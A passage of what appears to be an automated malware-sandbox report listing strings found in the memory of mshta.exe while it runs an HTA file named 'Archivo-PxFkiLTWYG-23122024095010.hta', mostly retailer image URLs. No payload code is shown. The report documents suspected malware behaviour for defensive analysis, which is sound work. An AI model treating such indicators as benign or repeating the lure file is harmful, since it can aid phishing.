https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.pngU
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555748992.0000000009654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511626967.0000000009653000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573133207.0000000007150000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-Natal-9b95a4d5fb69.png3W
Source: mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580125535.000000000C141000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12485820978.0000000009DA1000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/250x260-atalho-app-enfeites-de-natal-e13cbf8
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574215733.00000000095EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-desk-1250x313px-Natal-f25ef34312d3.
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558448951.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/destaque-mobile-648x324px-Natal-0044175eebbb
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502389713.0000000002E8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556953480.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566649661.0000000002E92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502307562.0000000002E8C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-desk-1296x54-bd34177535b9.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/02/topinho-mobile-648x54-2362be2b92fb.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pnga
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_desk-cc5a6ad015ea.pngo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/3-home-destaque_mob-5885530f6181.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575123747.000000000968C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542652490.0000000009645000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.png=
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_desk-150a1979940c.pngv
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/4-home-destaque_mob-cf1beb995cdb.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567444909.00000000095A7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557426752.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509710023.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.png/e
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542414345.0000000009699000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_desk-d29896bdf9e3.pnge
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/03/5-home-destaque_mob-f70de84933f3.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573614739.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 